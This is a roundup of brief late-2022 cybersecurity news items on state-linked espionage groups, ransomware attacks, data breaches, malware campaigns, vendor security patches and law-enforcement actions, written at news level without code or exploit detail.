    A cyberespionage threat actor tracked as Billbug (a.k.a. Thrip, Lotus Blossom, Spring Dragon) has been running a campaign targeting a certificate authority, government agencies, and defense organizations in several countries in Asia. The most recent attacks were observed since at least March but the actor has been operating stealthily for more than a decade and it is believed to be a state-sponsored group working for China. Its operations have been documented by multiple cybersecurity companies over the past six years.

    Whoosh Confirms Data Breach After Hackers Sell 7.2M User Records

    Whoosh is Russia's leading urban mobility service platform, operating in 40 cities with over 75,000 scooters. The Russian scooter-sharing service has confirmed a data breach after hackers started to sell a database containing the details of 7.2 million customers on a hacking forum. The threat actor began selling the stolen data on a hacking forum on Friday; the database allegedly contains promotion codes that can be used to access the service for free, as well as partial user identification and payment card data.

    Previously Undetected Earth Longzhi APT Group Is a Subgroup of APT41

    Early this year, Trend Micro investigated a security breach suffered by a company in Taiwan. Threat actors employed a custom Cobalt Strike loader in the attack. Further analysis revealed that the same threat actor targeted multiple regions using a similar Cobalt Strike loader and has been active since 2020. The experts attributed the attacks to a new subgroup of the China-linked APT41 group, tracked as Earth Longzhi.

    SSVC: Prioritization of Vulnerability Remediation According to CISA

    The volume of newly discovered vulnerabilities continues to increase year after year. As threat actors become better at weaponizing vulnerabilities, it is becoming ever more important for organizations to make timely and well-judged decisions regarding vulnerability prioritization and remediation. While CISA regularly publishes its list of most exploited vulnerabilities and regularly updates the Known Exploited Vulnerabilities Catalog, it still remains a challenge for organizations to understand which security holes should be plugged first. To combat these challenges, CISA has been updating and promoting the Stakeholder-Specific Vulnerability Categorization (SSVC) system.

    Microsoft Fixes Windows DirectAccess Connectivity Issues

    Microsoft has resolved a known issue causing connectivity problems for Windows customers using the DirectAccess service to access their organizations remotely without using a virtual private network (VPN). According to Redmond, DirectAccess might not reconnect automatically after the impacted device experiences connectivity issues. Scenarios that could lead to this known issue include switching between access points or Wi-Fi networks and temporarily losing network connectivity. The problems affect enterprise endpoints where admins have deployed Windows updates released since mid-October.

    Kmsdbot, a New Evasive Bot for Cryptomining Activity and DDoS Attacks

    The malware was employed in cryptocurrency mining campaigns. KmsdBot supports multiple architectures, including Winx86, Arm64, mips64, and x86_64, and does not maintain persistence, to avoid detection. The malicious code was used in attacks targeting multiple sectors including the gaming industry, technology industry, and luxury car manufacturers. The first DDoS attack observed by Akamai targeted a gaming company named FiveM, which allows gamers to host custom private servers for Grand Theft Auto Online. The malware employed specific targeted attacks along with generic Layer 4 and Layer 7 attacks.

    Ukraine Says Russian Hacktivists Use New Somnia Ransomware

    Russian hacktivists have infected multiple organizations in Ukraine with a new ransomware strain called 'Somnia,' encrypting their systems and causing operational problems. The Computer Emergency Response Team of Ukraine (CERT-UA) has confirmed the outbreak via an announcement on its portal, attributing the attacks to 'From Russia with Love' (FRwL), also known as 'Z-Team,' whom they track as UAC-0118. The group previously disclosed creating the Somnia ransomware on Telegram and even posted evidence of attacks against tank producers in Ukraine. However, until today, Ukraine has not confirmed any successful encryption attacks by the hacking group.

    Multiple High-Severity Flaws Affect Widely Used OpenLiteSpeed Web Server Software

    Palo Alto Networks’ Unit 42 research team recently disclosed multiple vulnerabilities in the open-source OpenLiteSpeed Web Server as well as its enterprise version (LiteSpeed Web Server) which could be exploited to achieve remote code execution. In total, three vulnerabilities were uncovered, two rated high severity and one rated medium severity.
    The vulnerabilities include:

    • Remote Code Execution (CVE-2022-0073) (CVSS 8.8)
    • Privilege Escalation (CVE-2022-0074) (CVSS 8.8)
    • Directory Traversal (CVE-2022-0072) (CVSS 5.8)

    Canadian Food Retail Giant Sobeys Hit by Black Basta Ransomware

    Grocery stores and pharmacies belonging to Canadian food retail giant Sobeys have been experiencing IT systems issues since last weekend. Sobeys is one of two national grocery retailers in Canada, with 134,000 employees servicing a network of 1,500 stores in all ten provinces under multiple retail banners, including Sobeys, Safeway, IGA, Foodland, FreshCo, Thrifty Foods, and Lawtons Drugs.

    Ukraine Arrests Fraud Ring Members Who Made €200 Million per Year

    Ukraine's cyber police and Europol have identified and arrested five key members of an international investment fraud ring estimated to have caused losses of over €200 million per year. The operation of the investment scheme was spread across multiple European countries, including Ukraine, Germany, Spain, Latvia, Finland, and Albania. The scammers operate call centers and offices in these countries, as required to trick prospective investors into initiating a series of fake investments. The criminals created an extensive network of fake websites posing as cryptocurrency, stocks, bonds, futures, and options investment portals to promote the operation.

    APT29 Abused Windows Credential Roaming in an Attack Against a Diplomatic Entity

    The attack stands out for its use of the Windows Credential Roaming feature. Credential Roaming was introduced by Microsoft in Windows Server 2003 SP1 and is still supported on Windows 11 and Windows Server 2022. The feature is used to roam certificates and other credentials with the user within a domain. APT29, along with the APT28 cyber espionage group, was involved in the Democratic National Committee hack and the wave of attacks aimed at the 2016 US Presidential Elections.

    High-Severity Flaw Reported in Critical System Used by Oil and Gas Companies

    Security researchers at Claroty recently disclosed details of a vulnerability in a system used across oil and gas organizations. Tracked as CVE-2022-0902 (CVSS score: 8.1), the flaw is a path traversal vulnerability in ABB Totalflow flow computers and remote controllers. “Flow computers are special-purpose electronic instruments used by petrochemical manufacturers to interpret data from flow meters and calculate and record the volume of substances such as natural gas, crude oils, and other hydrocarbon fluids at a specific point in time. These gas measurements are critical not only when it comes to process safety, but are also used as inputs when bulk liquid or gas products change hands between parties, making it imperative that the flow measurements are accurately captured.”

    15,000 sites hacked for massive Google SEO poisoning campaign

    Hackers are conducting a massive black hat search engine optimization (SEO) campaign by compromising almost 15,000 websites to redirect visitors to fake Q&A discussion forums. The attacks were first spotted by Sucuri, who says that each compromised site contains approximately 20,000 files used as part of the search engine spam campaign, with most of the sites being WordPress. The researchers believe the threat actors' goal is to generate enough indexed pages to increase the fake Q&A sites' authority and thus rank better in search engines.

    Google Reveals Spyware Vendor's Use of Samsung Phone Zero-Day Exploits

    Google Project Zero has disclosed the details of three Samsung phone vulnerabilities that have been exploited by a spyware vendor since being designated with zero-day status. The flaws, tracked as CVE-2021-25337, CVE-2021-25369 and CVE-2021-25370, have been chained and exploited against Android phones, but they impact custom Samsung components. The security holes have been described as an arbitrary file read/write issue via a custom clipboard content provider, a kernel information leak, and a use-after-free in the display processing unit driver.

    Malicious extension lets attackers control Google Chrome remotely

    A new Chrome browser botnet named 'Cloud9' has been discovered in the wild using malicious extensions to steal online accounts, log keystrokes, inject ads and malicious JS code, and enlist the victim's browser in DDoS attacks. The Cloud9 browser botnet is effectively a remote access trojan (RAT) for the Chromium web browser, including Google Chrome and Microsoft Edge, allowing the threat actor to remotely execute commands. The malicious Chrome extension isn't available on the official Chrome web store but is instead circulated through alternative channels, such as websites pushing fake Adobe Flash Player updates. This method appears to be working well, as researchers at Zimperium reported today that they have seen Cloud9 infections on systems across the globe.

    Citrix urges admins to patch critical ADC, Gateway auth bypass

    On Tuesday, Citrix released security updates to address three flaws impacting Citrix ADC and Citrix Gateway, one of which is a critical authentication bypass vulnerability. Successful exploitation of these flaws could enable threat actors to gain unauthorized access to the targeted device, perform remote desktop takeover, and bypass login brute-force protections.

    VMware Fixes Three Critical Auth Bypass Bugs in Remote Access Tool

    VMware has released security updates to address three critical severity vulnerabilities in the Workspace ONE Assist solution that enable remote attackers to bypass authentication and elevate privileges to admin. Workspace ONE Assist provides remote control, screen sharing, file system management, and remote command execution to help desk and IT staff remotely access and troubleshoot devices in real time from the Workspace ONE console.

    Microsoft Patch Tuesday Updates Fix 6 Actively Exploited Zero-Days

    Eleven vulnerabilities are rated Critical and 53 are rated Important in severity. This month Microsoft addressed a couple of vulnerabilities in MS Exchange that are currently being exploited in the wild. “They were expected last month, but they are finally here (along with several other Exchange fixes). These bugs were purchased by the ZDI at the beginning of September and reported to Microsoft at the time. At some point later, they were detected in the wild. Microsoft has released several different mitigation recommendations, but the best advice is to test and deploy these fixes,” reads the announcement published by ZDI. “There were some who doubted these patches would be released this month, so it’s good to see them here.”

    Advanced RAT AgentTesla Most Prolific Malware in October

    Check Point researchers released their Global Threat Index for October 2022, which features metrics from millions of Check Point threat intel sensors installed across customer networks, endpoints, and mobile devices. The researchers found that AgentTesla accounted for nearly a fifth (16%) of total global detections in October. The report revealed that “AgentTesla was the most widespread malware, impacting 7% of organizations. The advanced RAT malware works as a keylogger and information stealer capable of collecting the victim’s keystrokes, taking screenshots and exfiltrating credentials.”

    Amadey Bot Spotted Deploying LockBit 3.0 Ransomware on Hacked Machines

    The Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems, researchers have warned. ‘Amadey bot, the malware that is used to install LockBit, is being distributed through two methods: one using a malicious Word document file, and the other using an executable that takes the disguise of the Word file icon,’ AhnLab Security Emergency Response Center (ASEC) said in a new report published today.

    New Laplas Clipper Malware Targeting Cryptocurrency Users via SmokeLoader

    Cryptocurrency users are being targeted with a new clipper malware strain dubbed Laplas by means of another malware known as SmokeLoader. SmokeLoader, which is delivered via weaponized documents sent through spear-phishing emails, further acts as a conduit for other commodity trojans like SystemBC and Raccoon Stealer 2.0, according to an analysis from Cyble. Observed in the wild since circa 2013, SmokeLoader functions as a generic loader capable of distributing additional payloads onto compromised systems, such as information-stealing malware and other implants. In July 2022, it was found to deploy a backdoor called Amadey. Cyble said it discovered over 180 samples of Laplas since October 24, 2022, suggesting a wide deployment.

    China is Likely Stockpiling and Deploying Vulnerabilities, says Microsoft

    Microsoft has asserted that China's offensive cyber capabilities have improved, thanks to a law that has allowed Beijing to create an arsenal of unreported software vulnerabilities. China's 2021 law required organizations to report security vulnerabilities to local authorities before disclosing them to any other entity. The rules mean Beijing can use local research to hoard vulnerability information.

    Robin Banks Phishing Service for Cybercriminals Returns with Russian Server

    According to a new report from cybersecurity firm IronNet, Robin Banks has returned after relocating its attack infrastructure to DDoS-Guard, a Russian provider of bulletproof hosting services. Robin Banks is a phishing-as-a-service platform that was uncovered back in July 2022. The platform offers ready-made phishing kits that have been used to target customers of well-known banks and online services including Citibank, Bank of America, Capital One, Wells Fargo, PNC, U.S. Bank, etc.

    British Govt Is Scanning All Internet Devices Hosted in UK

    The United Kingdom's National Cyber Security Centre (NCSC), the government agency that leads the country's cyber security mission, is now scanning all Internet-exposed devices hosted in the UK for vulnerabilities. The goal is to assess the UK's vulnerability to cyber-attacks and to help the owners of Internet-connected systems understand their security posture.

    New Crimson Kingsnake gang impersonates law firms in BEC attacks

    A business email compromise (BEC) group named 'Crimson Kingsnake' has emerged, impersonating well-known international law firms to trick recipients into approving overdue invoice payments. The threat actors impersonate lawyers who are sending invoices for overdue payment of services supposedly provided to the recipient firm a year ago. This approach creates a solid basis for the BEC attack, as recipients may be intimidated when receiving emails from large law firms like the ones impersonated in the scams.

    Cisco Addressed Several High-severity Flaws in Its Products

    Cisco addressed multiple vulnerabilities impacting some of its products, including high-severity flaws in identity, email, and web security products. The most severe vulnerability addressed by the IT giant is a cross-site request forgery (CSRF) flaw, tracked as CVE-2022-20961 (CVSS score of 8.8), that impacts the Identity Services Engine (ISE). An unauthenticated, remote attacker can exploit the vulnerability to perform arbitrary actions on a vulnerable device. The root cause of the issue is the insufficient CSRF protections for the web-based management interface of an affected device.

    Attackers Leverage Microsoft Dynamics 365 to Phish Users

    Attackers are abusing Microsoft Dynamics 365 Customer Voice to evade email filters and deliver phishing emails into Microsoft users’ inboxes, Avanan researchers are warning. Microsoft Dynamics 365 is a suite of enterprise resource planning (ERP) and customer relationship management (CRM) applications. Customer Voice is one of these applications, and it’s used for collecting data and feedback from customers via surveys, phone calls, etc. The attackers have created Microsoft Dynamics 365 Customer Voice accounts and are using them to send out phishing emails telling recipients that they have received a voicemail. To the end user, this looks like a voicemail from a customer, which would be important to listen to. Clicking on it is the natural step.

    LockBit Ransomware Claims Attack on Continental Automotive Giant

    LockBit allegedly stole some data from Continental's systems, and they are threatening to publish it on their data leak site if the company doesn't give in to their demands within the next 22 hours. The gang has yet to make any details available regarding what data it exfiltrated from Continental's network or when the breach occurred. Ransomware gangs commonly publish data on their leak sites as a tactic to scare their victims into negotiating a deal or into returning to the negotiation table. Since LockBit says that it will publish "all available" data, this indicates that Continental is yet to negotiate with the ransomware operation or it has already refused to comply with the demands.

    Black Basta Ransomware Gang Linked to the FIN7 Hacking Group

    Security researchers at Sentinel Labs have uncovered evidence that links the Black Basta ransomware gang to the financially motivated hacking group FIN7, also known as "Carbanak." When analyzing tools used by the ransomware gang in attacks, the researchers found signs that a developer for FIN7 has also authored the EDR (Endpoint Detection and Response) evasion tools used exclusively by Black Basta since June 2022.

    OPERA1ER APT Hackers Targeted Dozens of Financial Organizations in Africa

    A French-speaking threat actor dubbed OPERA1ER has been linked to a series of more than 30 successful cyber attacks aimed at banks, financial services, and telecom companies across Africa, Asia, and Latin America between 2018 and 2022. According to Singapore-headquartered cybersecurity company Group-IB, the attacks have led to thefts totaling $11 million, with actual damages estimated to be as high as $30 million. Some of the more recent attacks in 2021 and 2021 have singled out five different banks in Burkina Faso, Benin, Ivory Coast, and Senegal. Many of the victims identified are said to have been compromised twice, and their infrastructure subsequently weaponized to strike other organizations.

    Hundreds of U.S. news sites push malware in supply-chain attack

    Threat actors are using the compromised infrastructure of an undisclosed media company to deploy the SocGholish JavaScript malware framework (also known as FakeUpdates) on the websites of hundreds of newspapers across the U.S. ‘The media company in question is a firm that provides both video content and advertising to major news outlets. [It] serves many different companies in different markets across the United States,’ Sherrod DeGrippo, VP of threat research and detection at Proofpoint, told BleepingComputer. The threat actor behind this supply-chain attack (tracked by Proofpoint as TA569) has injected malicious code into a benign JavaScript file that gets loaded by the news outlets' websites.

    Dozens of PyPI Packages Caught Dropping ‘w4sp’ Info-Stealing Malware

    Researchers have identified over two dozen Python packages on the PyPI registry that imitate popular libraries but instead drop info-stealing malware after infecting machines. Most of these contain obfuscated code that drops the "W4SP" info-stealer, while others make use of malware purportedly created for "educational purposes" only. The packages, listed below, are typosquats: the threat actors publishing them have intentionally given them names similar to known Python libraries in the hope that developers attempting to fetch the real library make a spelling error and inadvertently retrieve one of the malicious ones instead.

    Emotet Botnet Starts Blasting Malware Again After 5 Month Break

    Emotet is a malware infection distributed through phishing campaigns containing malicious Excel or Word documents. When users open these documents and enable macros, the Emotet DLL will be downloaded and loaded into memory. Once loaded, the malware will search for and steal emails to use in future spam campaigns and drop additional payloads such as Cobalt Strike or other malware that commonly leads to ransomware attacks. While Emotet was considered the most distributed malware in the past, it suddenly stopped spamming on June 13th, 2022. Researchers from the Emotet research group Cryptolaemus reported that at approximately 4:00 AM ET on November 2nd, the Emotet operation suddenly came alive again, spamming email addresses worldwide.

    CISA Message on OpenSSL 3.0.7 Release

    To follow up on Monday’s message, OpenSSL has released a security advisory to address the two vulnerabilities (CVE-2022-3602 and CVE-2022-3786) affecting OpenSSL versions 3.0.0 through 3.0.6. Both CVE-2022-3602 and CVE-2022-3786 can cause a denial of service. According to OpenSSL, a cyber threat actor leveraging CVE-2022-3786 "can craft a malicious email address to overflow four attacker-controlled bytes on the stack. This buffer overflow could result in a crash (causing a denial of service) or potentially remote code execution," allowing them to take control of an affected system.

    New Sandstrike Spyware Infects Android Devices via Malicious VPN App

    Threat actors are using newly discovered spyware known as SandStrike and delivered via a malicious VPN application to target Android users. They focus on Persian-speaking practitioners of the Baháʼí Faith, a religion developed in Iran and parts of the Middle East. The attackers are promoting the malicious VPN app as a simple way to circumvent censorship of religious materials in certain regions. To spread it, they use social media accounts to redirect potential victims to a Telegram channel that would provide them with links to download and install the booby-trapped VPN.

    Dropbox Breach: Hackers Gained Unauthorized Access to 130 GitHub Source Code Repositories

    On Tuesday, Dropbox disclosed it was the victim of a phishing campaign that enabled unidentified threat actors to gain unauthorized access to 130 of its source code repositories on GitHub. The repositories allegedly contained copies of modified third-party libraries used by Dropbox, internal prototypes, and some tools and configuration files used by the file hosting service’s security team.

    Ransomware Research: 17 Leaked Databases Operated by Threat Actors Threaten Third-Party Organizations

    Ransomware remains a serious threat to organizations, Deep Instinct, a New York-based deep learning cybersecurity specialist, said in its recently released 2022 Interim Cyber Threat Report. It’s no surprise, the company said, as there are currently 17 leaked databases operated by threat actors who are leveraging the data for attacks on third-party companies, most notably social engineering, credential theft, and triple-extortion attacks.

    VMware Warns of the Public Availability of CVE-2021-39144 Exploit Code

    VMware warned of the existence of a public exploit targeting a recently addressed critical remote code execution (RCE) vulnerability, tracked as CVE-2021-39144 (CVSS score of 9.8), in NSX Data Center for vSphere (NSX-V). VMware NSX is a network virtualization solution that is available in VMware vCenter Server. The remote code execution vulnerability resides in the XStream open-source library. Unauthenticated attackers can exploit the vulnerability in low-complexity attacks without user interaction.

    Hackers Selling Access to 576 Corporate Networks for $4 Million

    A new report shows that hackers are selling access to 576 corporate networks worldwide for a total cumulative sales price of $4,000,000, fueling attacks on the enterprise. The research comes from Israeli cyber-intelligence firm KELA which published its Q3 2022 ransomware report, reflecting stable activity in the sector of initial access sales but a steep rise in the value of the offerings. Although the number of sales for network access remained about the same as in the previous two quarters, the cumulative requested price has now reached $4,000,000. For comparison, the total value of initial access listings in Q2 2022 was $660,000, recording a drop in value that coincided with the summer ransomware hiatus that hurt demand. In the third quarter of 2022, KELA's analysts observed 110 threat actors posting 576 initial access offerings totaling a cumulative value of $4,000,000. The average selling price of these listings was $2,800, while the median selling price reached a record figure of $1,350.

    FTC Takes Enforcement Action Against EdTech Giant Chegg

    The Federal Trade Commission (FTC) has taken legal action against EdTech player Chegg, alleging the firm has failed to protect its customers after suffering four data breaches since 2017. The FTC’s proposed order alleged Chegg took “shortcuts” with the personal data of millions of its students and will mandate enhanced data security, limits to data collection, improved access controls and more autonomy for students to delete their own data. The California-based company – which sells online tutoring and online scholarship search services, among other things – collects a large amount of personal and financial information on its customers. This includes their religious affiliation, date of birth, sexual orientation, disabilities, Social Security numbers and medical data, the FTC said.

    Microsoft fixes critical RCE flaw affecting Azure Cosmos DB

    Analysts at Orca Security recently disclosed a critical vulnerability affecting Azure Cosmos DB that could allow an unauthenticated threat actor to gain read and write access to containers. The flaw, dubbed CosMiss, resides in the Jupyter Notebooks built into Azure Cosmos DB, which integrate with the Azure portal and Azure Cosmos DB accounts to make querying, analyzing, and visualizing NoSQL data and results easier.

    Former British Prime Minister Liz Truss’s Phone Was Allegedly Hacked by Russian Spies

    The personal mobile phone of British Prime Minister Liz Truss was hacked by cyber spies suspected of working for the Kremlin, the Daily Mail reported. According to the British tabloid, the cyber-spies are believed to have gained access to top-secret exchanges with key international partners as well as private conversations with her friend, the British Conservative Party politician Kwasi Kwarteng.

    GitHub Flaw Could Have Allowed Attackers to Take Over Repositories of Other Users

    The vulnerability was discovered by Checkmarx, which calls the attack technique RepoJacking. The flaw could allow an attacker to take control of a GitHub repository and potentially infect all applications and other code relying on it with malicious code. Unless explicitly tended to, all renamed usernames on GitHub were vulnerable to this flaw, including over 10,000 packages on the Go, Swift, and Packagist package managers.

    Cross-Sector Cybersecurity Performance Goals

    In July 2021, President Biden signed a National Security Memorandum on Improving Cybersecurity for Critical Infrastructure Control Systems. This memorandum required CISA, in coordination with the National Institute of Standards and Technology (NIST) and the interagency community, to develop baseline cybersecurity performance goals that are consistent across all critical infrastructure sectors. These voluntary cross-sector Cybersecurity Performance Goals (CPGs) are intended to help establish a common set of fundamental cybersecurity practices for critical infrastructure, and especially help small- and medium-sized organizations kickstart their cybersecurity efforts.

    ConnectWise Recover and R1Soft Server Backup Manager Critical Security Release

    ConnectWise Recover: Recover v2.9.7 and earlier versions are impacted by a vulnerability described as "Improper Neutralization of Special Elements in Output Used by a Downstream Component." If exploited, an attacker could execute remote code or directly access confidential data.

    Affected versions: ConnectWise Recover v2.9.7 and earlier versions are impacted. R1Soft SBM v6.16.3 and earlier versions are also impacted.

    Raspberry Robin Operators Selling Cybercriminals Access to Thousands of Endpoints

    The Raspberry Robin worm is becoming an access-as-a-service malware for deploying other payloads, including IcedID, Bumblebee, TrueBot (aka Silence), and Clop ransomware. It is "part of a complex and interconnected malware ecosystem, with links to other malware families and alternate infection methods beyond its original USB drive spread," the Microsoft Security Threat Intelligence Center (MSTIC) said in a detailed write-up. Raspberry Robin, also called QNAP Worm owing to the use of compromised QNAP storage servers for command-and-control, is the name given to a malware by cybersecurity company Red Canary that spreads to Windows systems through infected USB drives.

    Google Fixes Seventh Chrome Zero-Day Exploited in Attacks This Year

    On Thursday, Google released security updates to address a high-severity zero-day bug that it says is actively being exploited in the wild. Tracked as CVE-2022-3723, the vulnerability is a type confusion bug in the Chrome V8 JavaScript engine. Type confusion bugs occur when a program allocates a resource, object, or variable using one type and then accesses it using a different, incompatible type, resulting in out-of-bounds memory access. As such, a malicious threat actor could use this access to read sensitive information, cause crashes, and execute arbitrary code.

    API Attacks Have Emerged as the #1 Threat Vector in 2022

    Gartner released new statistics this week on API attacks. According to the researchers, APIs have become the leading attack vector for enterprise web applications. As more organizations move their operations to cloud-based services, data is being moved with APIs. “Organizations are using APIs to build complex applications that serve as the foundation for their business models since they offer an effective way to leverage the data and functionality delivered by an organization’s digital applications and services. They are becoming more popular due to their ability to provide connectivity between disparate systems. For example, an API for a bank can allow you to access your account information from a mobile app or website. In addition, companies may use APIs for internal processes, such as billing or inventory management.”

    Android Malware Droppers With 130K Installs Found on Google Play

    A set of Android malware droppers were found infiltrating the Google Play store to install banking trojans while pretending to be app updates. Malware droppers are a challenging category of apps to stop because they do not contain malicious code themselves and thus can more easily pass Google Play reviews when submitted to the store. At the same time, they do not raise suspicion among users, as they provide the advertised functionality while the malicious behavior is conducted behind the scenes. Researchers at ThreatFabric, who discovered the new set of droppers, report a rise in the use of droppers for Android malware distribution precisely because they offer a stealthy pathway to infecting devices. This is particularly important considering the ever-increasing restrictions and safeguards introduced with each major Android release, which prevent malware from abusing permissions, fetching malicious modules from external resources, or using the Accessibility service to perform unlimited actions on the device.

    Hackers Use Microsoft IIS Web Server Logs to Control Malware

    The Cranefly hacking group, aka UNC3524, uses a previously unseen technique of controlling malware on infected devices via Microsoft Internet Information Services (IIS) web server logs. Microsoft Internet Information Services (IIS) is a web server that hosts websites and web applications. It’s also used by other software, such as Outlook on the Web (OWA) for Microsoft Exchange, to host management apps and web interfaces.

    OpenSSL to Fix the Second Critical Flaw Ever

    The OpenSSL Project announced that it is going to release updates to address a critical vulnerability in the open-source toolkit. Experts pointed out that it is the first critical vulnerability patched in the toolkit since September 2016.

    “The OpenSSL project team would like to announce the forthcoming release of OpenSSL version 3.0.7. This release will be made available on Tuesday 1st November 2022 between 1300-1700 UTC,” reads the announcement. “OpenSSL 3.0.7 is a security-fix release. The highest severity issue fixed in this release is CRITICAL.”

    Notorious ‘Bestbuy’ Hacker Arraigned for Running Dark Web Market

    A notorious British hacker was arraigned on Wednesday by the U.S. Department of Justice for allegedly running the now-defunct "The Real Deal" dark web marketplace. The 34-year-old defendant Daniel Kaye (aka Bestbuy, Spdrman, Popopret, UserL0ser) allegedly ran the illicit services market between early 2015 and November 2016, when The Real Deal shut down. Kaye also allegedly trafficked Twitter and LinkedIn accounts and conspired with a threat actor known as TheDarkOverlord to sell stolen Social Security numbers. He laundered the cryptocurrency obtained while operating The Real Deal using the Bitmixer[.]io Bitcoin mixer service to hide the illicit gains from law enforcement's blockchain tracing efforts.

    Developing Situation: Calix GigaCenter Under Attack - Calix Statement

    Calix development is, and has been, investigating this issue and working on fixes that include remediating systems impacted as well as preventing exploitation of other systems. The problem is understood and a fix is forthcoming. When it is available, customers will be advised via account teams, service bulletins and proactive alerts. This community post will also be updated with information as it becomes available.

    Developing Situation: Calix GigaCenter Under Attack

    We received reports this morning that some Calix GigaCenters were under attack. According to reports, Calix GigaCenter routers that have default or compromised credentials are being attacked. In one case, a service provider reported that 10% of their GigaCenters (844E) rebooted overnight. Another service provider reported that their DNS server’s cache was exhausted impacting DNS resolution.

    VMware Releases Patch for Critical RCE Flaw in Cloud Foundation Platform

    On Tuesday, VMware released security updates to address a critical flaw in the VMware Cloud Foundation Product, a hybrid cloud platform that is used to run enterprise apps in private or public environments. Tracked as CVE-2021-39144, the vulnerability is related to a remote code execution flaw that resides in XStream, an open-source library used by Cloud Foundation.

    RomCom Hackers Circulating Malicious Copy of Popular Software to Target Ukrainian Military

    The threat actor behind a remote access trojan called RomCom RAT has been observed targeting Ukrainian military institutions as part of a new spear-phishing campaign that commenced on October 21, 2022. The development marks a shift in the attacker's modus operandi, which has been previously attributed to spoofing legitimate apps like Advanced IP Scanner to drop backdoors on compromised systems.

    Two Flaws in Cisco Anyconnect Secure Mobility Client for Windows Actively Exploited

    Cisco is warning of exploitation attempts targeting two security flaws, CVE-2020-3153 (CVSS score: 6.5) and CVE-2020-3433 (CVSS score: 7.8), in the Cisco AnyConnect Secure Mobility Client for Windows. Both vulnerabilities are dated 2020 and are now patched.

    • The CVE-2020-3153 flaw resides in the installer component of AnyConnect Secure Mobility Client for Windows; an authenticated local attacker can exploit the flaw to copy user-supplied files to system-level directories with system-level privileges.
    • The CVE-2020-3433 vulnerability resides in the interprocess communication (IPC) channel of the Cisco AnyConnect Secure Mobility Client for Windows. An authenticated, local attacker can exploit the issue to perform a DLL hijacking attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.

    Microsoft: Server Manager Disk Resets Can Lead to Data Loss

    Microsoft warns that a newly acknowledged issue can lead to data loss when resetting virtual disks using the Server Manager management console. Server Manager helps IT admins manage Windows-based servers from their desktops without requiring a Remote Desktop connection or physical access to the servers. Because of this issue, admins attempting to reset (or clear) a virtual disk might accidentally reset the wrong disk, leading to data corruption. They will also see "Failed to reset disk" errors in the Task Progress dialog window, with the 'Found multiple disks with the same ID. Please update your storage driver and then try again.' error message.

    Malicious Clicker Apps in Google Play Have 20M+ Installs

    Security researchers at McAfee have discovered 16 malicious clicker apps available in the official Google Play store that were installed more than 20 million times. One of these apps, DxClean, has been installed more than five million times, and its user rating was 4.1 out of 5 stars. Clicker apps are adware that loads ads in invisible frames or in the background and clicks them to generate revenue for the threat actors behind the campaign. Threat actors have concealed the malicious code in practical utility applications like Flashlight (Torch), QR readers, Camera, Unit converters, and Task managers. Once executed, the clicker apps download their configuration from a remote server and register an FCM listener to receive push messages.

    Hive Claims Ransomware Attack on Tata Power, Begins Leaking Data

    Hive ransomware group has claimed responsibility for a cyber attack disclosed by Tata Power this month. A subsidiary of the multinational conglomerate Tata Group, Tata Power is India's largest integrated power company based in Mumbai. In screenshots seen by BleepingComputer, Hive operators have posted data they claim to have stolen from Tata Power, indicating that the ransom negotiations failed.

    Exploited Windows Zero-day Lets JavaScript Files Bypass Security Warnings

    A new Windows zero-day allows threat actors to use malicious stand-alone JavaScript files to bypass Mark-of-the-Web security warnings. Threat actors have already been seen using the zero-day bug in ransomware attacks. Windows includes a security feature called Mark-of-the-Web (MoTW) that flags a file as having been downloaded from the Internet and, therefore, as something that should be treated with caution because it could be malicious.

    Medibank Data Breach: More Customers Affected, Attacker Got in via Stolen Credentials

    Australian private health insurance provider Medibank has revealed that the hack and data breach it discovered over two weeks ago has affected more customers than initially thought. “We have received a series of additional files from the criminal. We have been able to determine that this includes: a copy of the file received last week containing 100 ahm policy records (including personal and health claims data); a file of a further 1,000 ahm policy records (including personal and health claims data); and files which contain some Medibank and additional ahm and international student customer data. It has become clear that the criminal has taken data that now includes Medibank customer data, in addition to that of ahm and international student customers,” the company said.

    US Charges Two Chinese Agents in Huawei Obstruction Case

    The US has announced another blockbuster set of charges against Chinese nationals in three cases, including one in which two agents are said to have paid bribes for inside information on the federal prosecution of Huawei. The US Department of Justice (DoJ) unveiled the charges yesterday and, although Huawei is not named, widespread reports claim it is the telco at the center of the case. The US filed a string of charges of racketeering and conspiracy to steal trade secrets against the firm in 2019 and 2020.

    Daixin Team Targets Health Organizations With Ransomware, US Agencies Warn

    CISA, the FBI, and the Department of Health and Human Services (HHS) warned that the Daixin Team cybercrime group is actively targeting U.S. businesses, mainly in the Healthcare and Public Health (HPH) Sector, with ransomware operations. The Daixin Team is a ransomware and data extortion group that has been active since at least June 2022. The group has focused on the HPH Sector with operations aimed at deploying ransomware and exfiltrating personally identifiable information (PII) and patient health information (PHI), threatening to release the stolen data if a ransom is not paid.

    Botnet Distributing Self-Unlocking Password-Protected RAR Files to Drop Malware

    The notorious Emotet botnet has been linked to a new wave of malspam campaigns that take advantage of password-protected archive files to drop CoinMiner and Quasar RAT on compromised systems. In an attack chain detected by Trustwave SpiderLabs researchers, an invoice-themed ZIP file lure was found to contain a nested self-extracting (SFX) archive, the first archive acting as a conduit to launch the second. While phishing attacks like these traditionally require persuading the target into opening the attachment, the cybersecurity company said the campaign sidesteps this hurdle by making use of a batch file to automatically supply the password to unlock the payload.

    Thousands of GitHub Repositories Deliver Fake PoC Exploits With Malware

    Researchers at the Leiden Institute of Advanced Computer Science found thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for various vulnerabilities, some of them including malware. GitHub is one of the largest code hosting platforms, and researchers use it to publish PoC exploits to help the security community verify fixes for vulnerabilities or determine the impact and scope of a flaw. According to the technical paper from the researchers at Leiden Institute of Advanced Computer Science, the possibility of getting infected with malware instead of obtaining a PoC could be as high as 10.3%, excluding proven fakes and prankware.

    Typosquat Campaign Mimics 27 Brands to Push Windows, Android Malware

    A massive, malicious campaign is underway using over 200 typosquatting domains that impersonate twenty-seven brands to trick visitors into downloading various Windows and Android malware. Typosquatting is an old method of tricking people into visiting a fake website by registering a domain name similar to that used by genuine brands. The domains used in this campaign are very close to the authentic ones, featuring a single letter position swap or an additional "s," making them easy for people to miss. The malicious websites are clones of the originals or at least convincing enough, so there's not much to give away the fraud.

    Alert (AA22-294A) Daixin Team, Ransomware Attacks

    The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Health and Human Services (HHS) are releasing this joint CSA to provide information on the “Daixin Team,” a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations.

